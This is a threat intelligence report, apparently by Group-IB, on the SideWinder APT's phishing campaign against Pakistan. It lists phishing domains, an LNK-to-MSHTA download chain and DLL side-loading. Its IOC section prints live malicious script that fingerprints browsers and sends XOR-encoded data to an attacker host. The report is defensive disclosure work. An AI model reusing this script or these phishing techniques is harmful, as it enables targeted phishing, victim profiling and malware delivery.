BACK
ENGLISH
ENGLISH




1.06.2022

SideWinder.AntiBot.Script

APT SideWinder’s new tool that narrows their reach to Pakistan
Nikita Rostovtsev
Threat Analyst at the Advanced Persistent Threat Research Team, Group-IB
Alexander Badaev
Junior Analyst at APT Research Team, Group-IB
Group-IB Threat Intelligence researchers have discovered a new malicious infrastructure and a custom tool of the APT group SideWinder (aka Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04 and APT-C-17), a threat actor that is believed to be originating from India and primarily targeting Pakistan. The newly discovered custom tool, codenamed SideWinder.AntiBot.Script, is being used in the gang’s phishing attack against Pakistani targets. Group-IB Threat Intelligence team shares its findings so that security teams can more effectively identify SideWinder attacks.

Key findings

  • Over the last year, Group-IB Threat Intelligence system identified 92 IP addresses that have been used by SideWinder APT for phishing emails.
  • Pakistan remains the primary target for SideWinder. The attackers are especially interested in the Pakistani government organizations based on the discovered phishing document and public studies.
  • Phishing links in emails or posts that mimic legitimate notifications and services of government agencies and organizations in Pakistan are primary attack vectors of the gang.
  • SideWinder started using an anti-bot script to filter their victims - they are only interested in Pakistani users.
  • The group continues to distribute malicious files in ZIP archives with an LNK file inside, which downloads an HTA file from a remote server.
  • Upon discovery, Group-IB Threat Intelligence team notified relevant local authorities and shared its findings to make sure that the threat can be identified and contained at early stages.

SideWinder Profile

The SideWinder APT (attlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04 and APT-C-17) is believed to be an Indian nation-state threat actor.

In their attacks, SideWinder was seen targeting government, military, and economic sectors in Southeast Asia: in Afghanistan, Nepal, Sri Lanka, Bhutan, Myanmar, the Philippines, Bangladesh, Singapore, and China. However, since the discovery of the group in 2012, Pakistan has been the primary target of SideWinder. In the last year alone, several SideWinder’s attacks targeting Pakistan have been detected. SideWinder was particularly interested in the Pakistani military targets.

The Pakistani government even published an official advisory about SideWinder activity.

Image 1. Fragment of the official notification about SideWinder’s attacks

Group-IB researchers have repeatedly spotted phishing documents intended for Pakistani targets in public and private sector organizations.

For example, the following phishing document contains information about a proposal for a formal discussion of the impact of US withdrawal from Afghanistan on maritime security:

Image 2. Phishing document SHA-1: a74f9baa1791476c489942dd9e24c8c6fd0822cd

In addition, the group was seen cloning government websites to collect user credentials.

Below you can find a phishing page mimicking a government portal in Sri Lanka designed by SideWinder:

Image 3: Phishing page login panel - http://5.2.79[.]135/!/n/

Figure 3: The attacker’s injector

SideWinder Network Infrastructure

Over the last year, Group-IB’s Threat Intelligence solution detected 92 IP addresses used by SideWinder. The servers were automatically detected by Group-IB and Threat Intelligence users immediately received a proactive notification about the appearance of the new malicious infrastructure.

The analysis of the servers revealed that they were primarily used for phishing attacks. SideWinder’s phishing attacks will be covered later in the text in more detail.

Below is a summary of the server 2.56.245[.]21, one of Sidewinder’s servers. According to Group-IB data, the server has been in use by SideWinder since at least January 22, 2022.

Image 4: Network Indicators related to 2.56.245[.]21 Source: Group-IB Threat Intelligence

Thanks to Group-IB’s Network Graph Analysis tool, shown above, it was possible to discover that this address is used as the A-record for the following domains:
  • finance.pakgov[.]net;
  • vpn.pakgov[.]net;
  • csd.pakgov[.]net;
  • hajj.pakgov[.]net;
  • nadra.pakgov[.]net;
  • pt.pakgov[.]net;
  • flix.pakgov[.]net;
  • covid.pakgov[.]net.
As you may have guessed, these are all phishing domains mimicking legitimate domains of Pakistani governmental and non-governmental institutions, such as finance.gov.pk.

Image 5. A fragment of the network infrastructure associated with the SideWinder group. Source: Group-IB Threat Intelligence

Phishing categorization

Each of the previously mentioned servers detected by Group-IB Threat Intelligence system mimic the public services related to Pakistan. Some of them are:
While investigating these malicious domains, Group-IB researchers found a phishing link - "vpn.pakgov[.]net/Download-3b00fd1a" - which redirects to a legitimate domain "securevpn.com". This may indicate a temporary suspension of the malicious campaign or conversely the link could redirect to a malicious site in the future as part of a different campaign.

Image 6. Screenshot with redirect to legitimate securevpn.com

Also among the discovered phishing links, Group-IB researchers found a link that downloaded an application from the official Google Play store called "SecureVPN".

Image 7. Screenshot from the Google Play store

The app in question looks suspicious: it has only 10+ downloads. It was published by the author, “ross jack”, with only one project. Furthermore, the description of the application was copied from NordVPN's description:

Image 8. Screenshot from the Microsoft Edge extension store

Therefore, Group-IB researchers assume that the application most likely mimics the legitimate Secure VPN application of the same name. At runtime, this application performs the following requests:
  • hXXps://api.vpn-secure[.]co/secureVpn/;
  • hXXps://api.vpn-secure[.]co/secureVpn/register;
However, at the time of the research, they were unavailable, and a request to the root of the page redirects to the legitimate NordVPN domain.

Image 9. Request to the root of the api.vpn-secure[.]co

In 2020, Trend Micro researchers found similar malicious apps that were attributed to the SideWinder group. These apps were also uploaded to the Google Play Store.It is worth noting that at the time of writing we cannot confirm if the Secure VPN app developed by "ross jack" is 100% malicious. This research is ongoing.

Kill Chain

In this section we will take a closer look at the infection chain.

As in previous SideWinder’s attacks, it all starts with a phishing link:
Group-IB researchers also found malicious links posted on Facebook:

Image 13. Screenshot of a malicious link on Facebook

Once the victim clicks on the link, an archive with a malicious .LNK file or RTF document is downloaded. In the case of LNK, the files have a Microsoft Word icon, making it appear more legitimate, encouraging people to open. Whether the initial vector was a phishing email or a phishing link posted on social media, the malicious payload is always launched using the DLL side-loading technique, which provides persistence and has RAT functionality.
SideWinder.AntiBot.Script
As soon as the recipient clicks on the link, the new tool, dubbed SideWinder.AntiBot.Script by Group-IB researchers, comes into play. The script checks the client browser environment and, based on several parameters, decides whether to issue a malicious file or redirect to a legitimate resource.

For example, let's take finance.pakgov[.]net which we have described a little already.
The phishing link appears as follows - hxxps://finance.pakgov[.]net/salary-a4222e91.
Let's first see what happens if we try to follow this link with settings different from a typical Pakistani user.

Image 14. Screenshot with hxxps://finance.pakgov[.]net/salary-a4222e91 request and redirect to legitimate finance.gov.pk

As you can see in the screenshot above, when a client visits this link, which the anti-bot script does not like, the script redirects to a legitimate document located on a legitimate resource: finance.gov.pk. And, the script won't even work if the client's IP address differs from Pakistan's - the client will automatically be redirected to the legitimate resource. These are common techniques that are used to avoid detection by threat researchers.

Image 15. Redirect to a legitimate document.

However, if you follow a link with an IP address from Pakistan, the anti-bot script will work.

Image 16. SideWinder.AntiBot.Script snippet (the full version of the script is available below in the list of compromise indicators)

To begin with, the CAPTCHA page immediately catches the eye. While the user is waiting, the client's browser is profiled to give the final verdict.

Image 17. Screenshot of fake CloudFlare page

If the client does not pass the anti-bot script filtering, for example, by the parameter of the operating system used, then a corresponding message will be displayed.

Image 18. Screenshot of the platform compatibility error.

Detection of a client's browser environment
The script is written to collect everything it can reach to verify that the user is not a researcher or passerby on the internet:
  • Geo-position - check;

Image 19. A snippet of SideWinder.AntiBot.Script

  • Version of the operating system - check;
  • Data about the user agent - check;
  • System language settings - check;
  • The number of logical processors - check;
  • Accessing the CredentialsContainer interface, which can return saved passwords from the browser if the necessary function is called. (not used);

Image 20. A snippet of SideWinder.AntiBot.Script

  • A feature that avoids automatic analysis using the Headless version of Chrome - check;

Image 21. A snippet of SideWinder.AntiBot.Script

  • A list of possible video cards used and checking their compliance with the screen size. (Images 22 and 23):

Image 24. A snippet of SideWinder.AntiBot.Script

  • Check for compliance with operating systems from the list:

Image 25. A snippet of SideWinder.AntiBot.Script

  • And most importantly, the function of issuing a malicious file and the function to redirect to a legitimate resource.

Image 26. A snippet of SideWinder.AntiBot.Script

However, in another script found on another malicious domain - finance.govpk-mail[.]net - the redirect function still led to a link with a payload:

Image 27. A snippet of SideWinder.AntiBot.Script

Accordingly, the structure of network requests on this domain is as follows:

Image 28. Screenshot with network requests

The screenshot above shows link clicks from the initial phishing link - hxxps://finance.govpk-mail[.]net/financecircular-38149cbd to the page with the script, which is responsible for releasing the malicious file:

Image 29. A piece of malicious code that issues a payload.

Payload
In one case the downloadable file (SHA1- 4421f214c91a08ac0318871c6f918cfffe36d039) was an archive named "Pay and Pension Increase Circular_Finance Division.zip"
The contents of this archive consist of files:
  • 64a889e35b10a902170abe092c6c6b8f16c66dd1 - Pay and Pension Increase Circular_Finance Division.pdf.lnk;
  • 5e5e038453fde5ddf57820783dd9ce8f5f042df2 - ~wnotification002.tmp;
  • 6a99ce5387c5b67602b2ef633bfbdc184e4d845c - ~wnotification003.tmp.

Image 30. Contents of "Pay and Pension Increase Circular_Finance Division.zip

"Pay and Pension Increase Circular_Finance Division.pdf.lnk" is a shortcut that contains a command to download and execute the file hxxps://finance.govpk-mail[.]net/15523/1/12443/2/0/0/1/1874254181/79DWxM3xhqvyZapU4oq7D3M8j5wB6f4HVHnbIEc/files-60b6e42b/hta using MSHTA.

Image 31. Contents of "Pay and Pension Increase Circular_Finance Division.pdf.lnk

Unfortunately, the second stage of the payload turned out to be inactive, so we got a "404 Not Found" error.

Image 32. Screenshot of the error receiving the second stage of the payload.

However, this attack is not unique to SideWinder. HTAs typically contain PowerShell, VBScript, or JavaScript, and the latter has been seen more often in recent attacks.
HTAs are typically used to download files for later use by the DLL-sideloading technique. In some cases, HTAs also upload a decoy document, usually in PDF format, to put the victim's attention down.

The use of this technique by this group was mentioned publicly by researchers from weixin:

Image 33. Fragment of Kill Chain taken from https://mp.weixin.qq.com/s/Kkta59k7r81uIBjJvE9pCw

When using this technique, HTA will load the "Duser.dll" file and copy the system file "credwiz.exe" into the same directory. The "credwiz.exe" loads "Duser.dll" with the Dll Side-Loading technique, which in turn downloads and executes the final backdoor. The final backdoor allows the attacker:
  • Collect system information;
  • Collect list of files and paths to them;
  • Collect selected files;
  • Update commands and C2 addresses.
Conclusion
Given the SideWinder’s widespread activity deploying new command and control servers and the number of observed phishing links, Group-IB Threat Intelligence team decided to publish these findings so that potential targets in Pakistan identified as part of the research could check their networks and identify attacks by Sidewinder that are in early stages. If you believe you may be a victim of similar phishing campaigns or that you may be one of the attackers’ targets, please reach out.
Try Group-IB Threat Intelligence now!
Optimize strategic, operational and tactical decision-making with best-in-class cyber threat analytics
Test Drive Group-IB Threat Intelligence

IOCs

Fragment of SideWinder.AntiBot.Script from https://finance.pakgov[.]net/salary-a4222e91

<script>
	function buttonClick() {
		if (navigator.geolocation) {
			navigator.geolocation.getCurrentPosition(showPosition);
		} else {
			x.innerHTML = 'Geolocation is not supported by this browser.';
		}
	}

	function showPosition(position) {
		alert(`lat ${position.coords.latitude} long ${position.coords.longitude}`);
	}
</script>
<script>
	var postUrl = 'https://finance.pakgov[.]net/733/1/670/2/0/0/1874372994/HvEdALWHsRoqS3eIArlDgXiyAcvV5TsjfqF7kVAK/files-8adb0199/ads';

	function encode(data, xorKey) {
		let enc = new TextEncoder();
		let dataBuff = enc.encode(data);
		let keyBuff = enc.encode(xorKey);

		let output = [];

		for (let i = 0; i < dataBuff.length; i++) output[i] = dataBuff[i] ^ keyBuff[i % keyBuff.length];

		return new Blob([new Uint8Array(output)]);
	}

	function redirect() {
		window.location.replace('https://www.finance.gov.pk/circulars/circular_14042022_2.pdf');
	}

	function postData(data) {
		try {
			var secretKey = '34-D4-3D-5B-6E-31-77-E7-27-06-96-CE-BE-E6-B5';
			const finalData = JSON.stringify(data);
			const encriptedData = encode(finalData, secretKey);

			fetch(postUrl, {
				method: 'POST',
				headers: {
					'Content-Type': 'application/text'
				},
				body: encriptedData
			})
				.then(() => {
					redirect();
				})
				.catch((err) => {
					redirect();
				});
		} catch (err) {
			redirect();
		}
	}

	function isCanvasSupported() {
		var elem = document.createElement('canvas');
		return !!(elem.getContext && elem.getContext('2d'));
	}

	function getBrowserDetails(gpuData) {
		var result = {};
		try {
			result.gpuData = gpuData;
			result.navigatorInfo = {
				oscpu: navigator.oscpu,
				credentials: navigator.credentials,
				clipboard: navigator.clipboard,
				hardwareConcurrency: navigator.hardwareConcurrency,
				geolocation: navigator.geolocation,
				userAgent: navigator.userAgent,
				language: navigator.language,
				languages: navigator.languages
			};
			try {
				result.canvasSupported = isCanvasSupported();
			} catch (canvasErr) {}

			result.utcOffset = new Date().getTimezoneOffset() / 60;
			postData(result);
		} catch (err) {
			redirect();
		}
	}

	function postDetection(data) {
		var detectionPostUrl = 'https://finance.pakgov[.]net/733/1/670/2/0/0/1874372994/HvEdALWHsRoqS3eIArlDgXiyAcvV5TsjfqF7kVAK/files-867fdc8a/adscom';
		try {
			fetch(detectionPostUrl, {
				method: 'POST',
				headers: {
					'Content-Type': 'application/text'
				},
				body: data
			})
				.then(() => {
					redirect();
				})
				.catch((err) => {
					redirect();
				});
		} catch (err) {
			redirect();
		}
	}